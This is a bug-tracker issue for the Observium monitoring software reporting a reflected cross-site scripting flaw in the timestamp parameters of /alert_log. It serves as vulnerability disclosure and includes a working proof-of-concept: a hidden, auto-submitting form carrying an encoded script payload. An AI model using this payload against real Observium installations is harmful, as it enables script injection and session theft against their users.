Uploaded image for project: 'Observium'
  1. Observium
  2. OBS-1868

[Security] - Reflected XSS on /alert_log

    XMLWordPrintable

Details

    Description

      Hello,

      Parameters "timestamp_from" and "timestamp_to" on a POST call /alert_log/alert_log/ seems to be vulnerable to Reflected Cross Site Scripting Vulnerability.

      Proof Of Concept Code:

      <form style="display:none" action="http://192.168.2.10/alert_log/alert_log/" method="POST">
      		 
          <input name="timestamp_from" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1)&lt;/scRipt&gt;"/> 
          <input name="timestamp_to" value=""/> 
          <input name="device_id%5b%5d" value="3"/> 
          <input name="alert_test_id%5b%5d" value="3"/> 
          <input name="log_type%5b%5d" value="ALERT_NOTIFY"/> 
      </form>
      		 
      <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>

      Regards
      Himanshu

      Attachments

        Activity

          People

            landy Mike Stupalov
            himanshudas Himanshu Das
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: